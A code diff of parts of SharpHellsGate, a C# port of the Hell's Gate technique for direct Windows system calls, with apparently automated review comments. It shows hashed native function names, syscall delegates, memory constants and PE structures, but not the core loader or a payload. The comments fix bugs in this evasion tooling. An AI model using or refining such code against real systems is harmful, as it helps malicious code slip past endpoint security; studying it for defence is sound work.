@ -0,0 +1,18 @@
|
|||
<Project Sdk="Microsoft.NET.Sdk">
|
||||
|
||||
<PropertyGroup>
|
||||
<OutputType>Exe</OutputType>
|
||||
<TargetFramework>net5.0</TargetFramework>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
|
||||
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||
<PlatformTarget>x64</PlatformTarget>
|
||||
</PropertyGroup>
|
||||
|
||||
</Project>
|
|
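Review bot: `AllowUnsafeBlocks` and `PlatformTarget` are duplicated in two PropertyGroups conditioned on `Debug|AnyCPU` and `Release|AnyCPU`, so any other configuration or platform value silently loses the x64 target that `Program.Main` assumes. Since the program refuses to run unless `IntPtr.Size == 8`, I would put `<PlatformTarget>x64</PlatformTarget>` and `<AllowUnsafeBlocks>true</AllowUnsafeBlocks>` in the unconditional group next to `<TargetFramework>` and drop the two conditional groups. None of the C# sources in this view use `unsafe`, so whether `AllowUnsafeBlocks` is needed at all depends on the `HellsGate` class, which is not visible here.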
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Diagnostics;
|
||||
|
||||
namespace SharpHellsGate {
|
||||
|
||||
/// <summary>
|
||||
/// Util class. Used mainly for debug output.
|
||||
/// </summary>
|
||||
public class Util {
|
||||
|
||||
/// <summary>
|
||||
/// Structure used to store the name, address, system call and hash of a native Windows function.
|
||||
/// </summary>
|
||||
public struct APITableEntry {
|
||||
public string Name;
|
||||
public Int64 Address;
|
||||
public Int16 Syscall;
|
||||
public UInt64 Hash;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtAllocateVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtAllocateVirtualMemoryHash { get; } = 0xf5bd373480a6b89b;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtProtectVirtualMemory function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtProtectVirtualMemoryHash { get; } = 0x858bcb1046fb6a37;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtCreateThreadEx function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtCreateThreadExHash { get; } = 0x64dc7db288c5015f;
|
||||
|
||||
/// <summary>
|
||||
/// DJB2 Hash of the NtWaitForSingleObject function name.
|
||||
/// </summary>
|
||||
public static UInt64 NtWaitForSingleObjectHash { get; } = 0xc6a2fa174e551bcb;
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Log an informational information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogInfo(string msg, int indent = 0, string prefix = "[>]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Blue);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log an error information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
public static void LogError(string msg, int indent = 0, string prefix = "[-]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Red);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a success information.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix</param>
|
||||
public static void LogSuccess(string msg, int indent = 0, string prefix = "[+]") {
|
||||
#if DEBUG
|
||||
if (string.IsNullOrEmpty(msg))
|
||||
return;
|
||||
|
||||
LogMessage(msg, prefix, indent, ConsoleColor.Green);
|
||||
#endif
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Log a string to the console and to the debugger.
|
||||
/// </summary>
|
||||
/// <param name="msg">Message to log.</param>
|
||||
/// <param name="indent">Indentation level.</param>
|
||||
/// <param name="prefix">Message prefix.</param>
|
||||
/// <param name="color">The color of the prifix on the console.</param>
|
||||
private static void LogMessage(string msg, string prefix, int indent, ConsoleColor color) {
|
||||
// Indent
|
||||
Console.Write(new String(' ', indent));
|
||||
Trace.Write(new String(' ', indent));
|
||||
|
||||
// Color and prefix
|
||||
Trace.Write(prefix);
|
||||
Console.ForegroundColor = color;
|
||||
Console.Write(prefix);
|
||||
Console.ResetColor();
|
||||
|
||||
// Message
|
||||
Console.WriteLine($" {msg}");
|
||||
Trace.WriteLine($" {msg}");
|
||||
}
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Revisited DJB2 algorithm.
|
||||
/// </summary>
|
||||
/// <param name="FunctionName">The ASCII name of a function.</param>
|
||||
/// <returns>The djb2 hash of the function name.</returns>
|
||||
public static UInt64 GetFunctionDJB2Hash(string FunctionName) {
|
||||
if (string.IsNullOrEmpty(FunctionName))
|
||||
return 0;
|
||||
|
||||
UInt64 hash = 0x7734773477347734;
|
||||
foreach (char c in FunctionName)
|
||||
hash = ((hash << 0x5) + hash) + (byte)c;
|
||||
|
||||
return hash;
|
||||
}
|
||||
|
||||
}
|
||||
}
|
|
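Review bot: `LogError` is the only error-reporting path the loaders have, yet its body is wrapped in `#if DEBUG`, so in a Release build every failure (`Module not loaded`, `Invalid DOS header signature`, `Invalid export address table (EAT).`) prints nothing and the callers that ignore return values continue on `default` data. I would take the `#if DEBUG` guard off `LogError` (keeping it on `LogInfo`/`LogSuccess` if quiet Release output is intended), or at minimum state it in the summary: `/// Compiled out in Release builds; callers must check return values rather than rely on this output.` Separately, `GetFunctionDJB2Hash` folds each `char` through `(byte)c`, which is correct for the ASCII export names it is fed but should be stated in its docstring, e.g. `/// Hashes only the low byte of each char; input is expected to be ASCII export names.`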
@ -0,0 +1,93 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Contains all the delegates used to execute the system calls.
|
||||
/// </summary>
|
||||
public class DFunctions {
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtAllocateVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
IntPtr ZeroBits,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 AllocationType,
|
||||
UInt32 Protect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtProtectVirtualMemory(
|
||||
IntPtr ProcessHandle,
|
||||
ref IntPtr BaseAddress,
|
||||
ref IntPtr RegionSize,
|
||||
UInt32 NewProtect,
|
||||
out UInt32 OldProtect
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||
/// <param name="StackZeroBits"></param>
|
||||
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||
/// <param name="lpBytesBuffer"></param>
|
||||
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtCreateThreadEx(
|
||||
ref IntPtr hThread,
|
||||
uint DesiredAccess,
|
||||
IntPtr ObjectAttributes,
|
||||
IntPtr ProcessHandle,
|
||||
IntPtr lpStartAddress,
|
||||
IntPtr lpParameter,
|
||||
bool CreateSuspended,
|
||||
uint StackZeroBits,
|
||||
uint SizeOfStackCommit,
|
||||
uint SizeOfStackReserve,
|
||||
IntPtr lpBytesBuffer
|
||||
);
|
||||
|
||||
/// <summary>
|
||||
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||
/// </summary>
|
||||
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||
public delegate uint NtWaitForSingleObject(
|
||||
IntPtr ObjectHandle,
|
||||
bool Alertable,
|
||||
ref Structures.LARGE_INTEGER TimeOut
|
||||
);
|
||||
}
|
||||
}
|
|
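Review bot: The `NtCreateThreadEx` delegate declares `StackZeroBits`, `SizeOfStackCommit` and `SizeOfStackReserve` as `uint`, whereas the native prototype takes `SIZE_T` for these (`ZeroBits`, `StackSize`, `MaximumStackSize`), and `CreateSuspended` as `bool` where the native parameter is a `ULONG Flags` bitmask. Those are the 8th–10th arguments and so travel in 8-byte stack slots; marshaling a 4-byte value there may leave the upper half of each slot undefined and the kernel seeing garbage stack sizes — I have not traced the generated stub, so treat this as something to confirm. I would declare them pointer-sized, `IntPtr StackZeroBits,` / `IntPtr SizeOfStackCommit,` / `IntPtr SizeOfStackReserve,` and change `bool CreateSuspended` to `uint Flags`; the call sites in the `HellsGate` class are outside this view and need the matching change. Also `NtWaitForSingleObject` takes `ref Structures.LARGE_INTEGER TimeOut`, so the infinite wait the doc comment describes (`NULL means infinite`) cannot be expressed; an `IntPtr TimeOut` variant would allow `IntPtr.Zero`.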
@ -0,0 +1,78 @@
|
|||
using System;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
|
||||
/// <summary>
|
||||
/// Windows Macros used for error and success codes and bitmasks.
|
||||
/// </summary>
|
||||
public static class Macros {
|
||||
|
||||
// NTSTATUS
|
||||
public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x3FFFFFFF;
|
||||
public static bool NT_INFORMATION(UInt32 ntstatus) => ntstatus >= 0x40000000 && ntstatus <= 0x7FFFFFFF;
|
||||
public static bool NT_WARNING(UInt32 ntstatus) => ntstatus >= 0x80000000 && ntstatus <= 0xBFFFFFFF;
|
||||
public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000 && ntstatus <= 0xFFFFFFFF;
|
||||
|
||||
// Common NTSTATUS
|
||||
public static UInt32 STATUS_SUCCESS { get; } = 0x00000000;
|
||||
public static UInt32 STATUS_UNSUCCESSFUL { get; } = 0xC0000001;
|
||||
public static UInt32 STATUS_NOT_IMPLEMENTED { get; } = 0xC0000002;
|
||||
|
||||
// Portable Executable
|
||||
public static Int16 IMAGE_DOS_SIGNATURE { get; } = 0x5a00 | 0x4D; // MZ
|
||||
public static Int32 IMAGE_NT_SIGNATURE { get; } = 0x00004500 | 0x00000050; // PE00
|
||||
|
||||
// Pseudo-Handles
|
||||
public static IntPtr GetCurrentProcess() => new IntPtr(-1);
|
||||
public static IntPtr GetCurrentThread() => new IntPtr(-2);
|
||||
public static IntPtr GetCurrentProcessToken() => new IntPtr(-4);
|
||||
public static IntPtr GetCurrentThreadToken() => new IntPtr(-5);
|
||||
public static IntPtr GetCurrentThreadEffectiveToken() => new IntPtr(-6);
|
||||
|
||||
// Page and Memory permissions
|
||||
public static UInt32 PAGE_NOACCESS { get; } = 0x01;
|
||||
public static UInt32 PAGE_READONLY { get; } = 0x02;
|
||||
public static UInt32 PAGE_READWRITE { get; } = 0x04;
|
||||
public static UInt32 PAGE_WRITECOPY { get; } = 0x08;
|
||||
public static UInt32 PAGE_EXECUTE { get; } = 0x10;
|
||||
public static UInt32 PAGE_EXECUTE_READ { get; } = 0x20;
|
||||
public static UInt32 PAGE_EXECUTE_READWRITE { get; } = 0x40;
|
||||
public static UInt32 PAGE_EXECUTE_WRITECOPY { get; } = 0x80;
|
||||
public static UInt32 PAGE_GUARD { get; } = 0x100;
|
||||
public static UInt32 PAGE_NOCACHE { get; } = 0x200;
|
||||
public static UInt32 PAGE_WRITECOMBINE { get; } = 0x400;
|
||||
public static UInt32 PAGE_GRAPHICS_NOACCESS { get; } = 0x0800;
|
||||
public static UInt32 PAGE_GRAPHICS_READONLY { get; } = 0x1000;
|
||||
public static UInt32 PAGE_GRAPHICS_READWRITE { get; } = 0x2000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE { get; } = 0x4000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READ { get; } = 0x8000;
|
||||
public static UInt32 PAGE_GRAPHICS_EXECUTE_READWRITE { get; } = 0x10000;
|
||||
public static UInt32 PAGE_GRAPHICS_COHERENT { get; } = 0x20000;
|
||||
public static UInt32 PAGE_ENCLAVE_THREAD_CONTROL { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_REVERT_TO_FILE_MAP { get; } = 0x80000000;
|
||||
public static UInt32 PAGE_TARGETS_NO_UPDATE { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_TARGETS_INVALID { get; } = 0x40000000;
|
||||
public static UInt32 PAGE_ENCLAVE_UNVALIDATED { get; } = 0x20000000;
|
||||
public static UInt32 PAGE_ENCLAVE_DECOMMIT { get; } = 0x10000000;
|
||||
public static UInt32 MEM_COMMIT { get; } = 0x00001000;
|
||||
public static UInt32 MEM_RESERVE { get; } = 0x00002000;
|
||||
public static UInt32 MEM_REPLACE_PLACEHOLDER { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RESERVE_PLACEHOLDER { get; } = 0x00040000;
|
||||
public static UInt32 MEM_RESET { get; } = 0x00080000 ;
|
||||
public static UInt32 MEM_TOP_DOWN { get; } = 0x00100000;
|
||||
public static UInt32 MEM_WRITE_WATCH { get; } = 0x00200000;
|
||||
public static UInt32 MEM_PHYSICAL { get; } = 0x00400000;
|
||||
public static UInt32 MEM_ROTATE { get; } = 0x00800000;
|
||||
public static UInt32 MEM_DIFFERENT_IMAGE_BASE_OK { get; } = 0x00800000;
|
||||
public static UInt32 MEM_RESET_UNDO { get; } = 0x01000000;
|
||||
public static UInt32 MEM_LARGE_PAGES { get; } = 0x20000000;
|
||||
public static UInt32 MEM_4MB_PAGES { get; } = 0x80000000;
|
||||
public static UInt32 MEM_64K_PAGES { get; } = (MEM_LARGE_PAGES | MEM_PHYSICAL);
|
||||
public static UInt32 MEM_UNMAP_WITH_TRANSIENT_BOOST { get; } = 0x00000001;
|
||||
public static UInt32 MEM_COALESCE_PLACEHOLDERS { get; } = 0x00000001;
|
||||
public static UInt32 MEM_PRESERVE_PLACEHOLDER { get; } = 0x00000002;
|
||||
public static UInt32 MEM_DECOMMIT { get; } = 0x00004000;
|
||||
public static UInt32 MEM_RELEASE { get; } = 0x00008000;
|
||||
public static UInt32 MEM_FREE { get; } = 0x00010000;
|
||||
}
|
||||
}
|
|
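Review bot: `NT_SUCCESS` is defined as `ntstatus <= 0x3FFFFFFF`, which excludes the informational range 0x40000000–0x7FFFFFFF that the SDK macro (`((NTSTATUS)Status) >= 0`) counts as success, so a syscall returning an informational status would be treated as a failure by anything using this helper. `public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x7FFFFFFF;` matches ntdef.h; `NT_INFORMATION` remains for callers that want the sub-range. The `<= 0xFFFFFFFF` bound in `NT_ERROR` is always true for a `UInt32` and can be dropped. The callers of these helpers live in the `HellsGate` class, which is not in this view, so I cannot tell whether any of the four syscalls used here would actually surface an informational status.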
@ -0,0 +1,128 @@
|
|||
using System;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
namespace SharpHellsGate.Win32 {
|
||||
public static class Structures {
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DOS_HEADER {
|
||||
public UInt16 e_magic; /*+0x000*/
|
||||
public UInt16 e_cblp; /*+0x002*/
|
||||
public UInt16 e_cp; /*+0x004*/
|
||||
public UInt16 e_crlc; /*+0x006*/
|
||||
public UInt16 e_cparhdr; /*+0x008*/
|
||||
public UInt16 e_minalloc; /*+0x00a*/
|
||||
public UInt16 e_maxalloc; /*+0x00c*/
|
||||
public UInt16 e_ss; /*+0x00e*/
|
||||
public UInt16 e_sp; /*+0x010*/
|
||||
public UInt16 e_csum; /*+0x012*/
|
||||
public UInt16 e_ip; /*+0x014*/
|
||||
public UInt16 e_cs; /*+0x016*/
|
||||
public UInt16 e_lfarlc; /*+0x018*/
|
||||
public UInt16 e_ovno; /*+0x01a*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
||||
public UInt16[] e_res; /*+0x01c*/
|
||||
public UInt16 e_oemid; /*+0x024*/
|
||||
public UInt16 e_oeminfo; /*+0x026*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
||||
public UInt16[] e_res2; /*+0x028*/
|
||||
public UInt32 e_lfanew; /*+0x03c*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_FILE_HEADER {
|
||||
public UInt16 Machine; /*+0x000*/
|
||||
public UInt16 NumberOfSections; /*+0x002*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt32 PointerToSymbolTable; /*+0x008*/
|
||||
public UInt32 NumberOfSymbols; /*+0x00c*/
|
||||
public UInt16 SizeOfOptionalHeader; /*+0x010*/
|
||||
public UInt16 Characteristics; /*+0x012*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_DATA_DIRECTORY {
|
||||
public UInt32 VirtualAddress; /*+0x000*/
|
||||
public UInt32 Size; /*+0x004*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_OPTIONAL_HEADER64 {
|
||||
public UInt16 Magic; /*+0x000*/
|
||||
public Byte MajorLinkerVersion; /*+0x002*/
|
||||
public Byte MinorLinkerVersion; /*+0x003*/
|
||||
public UInt32 SizeOfCode; /*+0x004*/
|
||||
public UInt32 SizeOfInitializedDatal; /*+0x008*/
|
||||
public UInt32 SizeOfUninitializedData; /*+0x00c*/
|
||||
public UInt32 AddressOfEntryPoint; /*+0x010*/
|
||||
public UInt32 BaseOfCode; /*+0x014*/
|
||||
public UInt64 ImageBasel; /*+0x018*/
|
||||
public UInt32 SectionAlignment; /*+0x020*/
|
||||
public UInt32 FileAlignment; /*+0x024*/
|
||||
public UInt16 MajorOperatingSystemVersion; /*+0x028*/
|
||||
public UInt16 MinorOperatingSystemVersion; /*+0x02a*/
|
||||
public UInt16 MajorImageVersion; /*+0x02c*/
|
||||
public UInt16 MinorImageVersion; /*+0x02e*/
|
||||
public UInt16 MajorSubsystemVersion; /*+0x030*/
|
||||
public UInt16 MinorSubsystemVersion; /*+0x032*/
|
||||
public UInt32 Win32VersionValue; /*+0x034*/
|
||||
public UInt32 SizeOfImage; /*+0x038*/
|
||||
public UInt32 SizeOfHeaders; /*+0x03c*/
|
||||
public UInt32 CheckSum; /*+0x040*/
|
||||
public UInt16 Subsystem; /*+0x044*/
|
||||
public UInt16 DllCharacteristics; /*+0x046*/
|
||||
public UInt64 SizeOfStackReserve; /*+0x048*/
|
||||
public UInt64 SizeOfStackCommit; /*+0x050*/
|
||||
public UInt64 SizeOfHeapReserve; /*+0x058*/
|
||||
public UInt64 SizeOfHeapCommit; /*+0x060*/
|
||||
public UInt32 LoaderFlags; /*+0x068*/
|
||||
public UInt32 NumberOfRvaAndSizes; /*+0x06c*/
|
||||
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
||||
public IMAGE_DATA_DIRECTORY[] DataDirectory; /*+0x070*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_NT_HEADERS64 {
|
||||
public UInt32 Signature; /*+0x000*/
|
||||
public IMAGE_FILE_HEADER FileHeader; /*+0x004*/
|
||||
public IMAGE_OPTIONAL_HEADER64 OptionalHeader; /*+0x018*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_EXPORT_DIRECTORY {
|
||||
public UInt32 Characteristics; /*+0x000*/
|
||||
public UInt32 TimeDateStamp; /*+0x004*/
|
||||
public UInt16 MajorVersion; /*+0x008*/
|
||||
public UInt16 MinorVersion; /*+0x00a*/
|
||||
public UInt32 Name; /*+0x00c*/
|
||||
public UInt32 Base; /*+0x010*/
|
||||
public UInt32 NumberOfFunctions; /*+0x014*/
|
||||
public UInt32 NumberOfNames; /*+0x018*/
|
||||
public UInt32 AddressOfFunctions; /*+0x01c*/
|
||||
public UInt32 AddressOfNames; /*+0x020*/
|
||||
public UInt32 AddressOfNameOrdinals; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||
public struct IMAGE_SECTION_HEADER {
|
||||
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
|
||||
public string Name; /*+0x000*/
|
||||
public UInt32 Misc; /*+0x008*/
|
||||
public UInt32 VirtualAddress; /*+0x00c*/
|
||||
public UInt32 SizeOfRawData; /*+0x010*/
|
||||
public UInt32 PointerToRawData; /*+0x014*/
|
||||
public UInt32 PointerToRelocations; /*+0x018*/
|
||||
public UInt32 PointerToLinenumbers; /*+0x01c*/
|
||||
public UInt16 NumberOfRelocations; /*+0x020*/
|
||||
public UInt16 NumberOfLinenumbers; /*+0x022*/
|
||||
public UInt32 Characteristics; /*+0x024*/
|
||||
}
|
||||
|
||||
[StructLayout(LayoutKind.Explicit, Size = 1)]
|
||||
public struct LARGE_INTEGER {
|
||||
[FieldOffset(0)] public Int64 QuadPart; /*+0x000*/
|
||||
[FieldOffset(0)] public UInt32 LowPart; /*+0x000*/
|
||||
[FieldOffset(4)] public UInt32 HighPart; /*+0x004*/
|
||||
}
|
||||
}
|
||||
}
|
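Review bot: `LARGE_INTEGER` is declared with `[StructLayout(LayoutKind.Explicit, Size = 1)]` while its fields occupy offsets 0–7, and the struct is passed by `ref` to `NtWaitForSingleObject` as the timeout. A declared size smaller than the fields is at best ignored by the runtime and at worst makes `Marshal.SizeOf` report 1 byte — I have not checked which applies on net5.0 — so the attribute should read `[StructLayout(LayoutKind.Explicit, Size = 8)]`. Separately, `SizeOfInitializedDatal` and `ImageBasel` in `IMAGE_OPTIONAL_HEADER64` carry a stray trailing `l` (`SizeOfInitializedData`, `ImageBase`); they do not change the layout but will trip anyone matching the fields against winnt.h.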
Binary file not shown.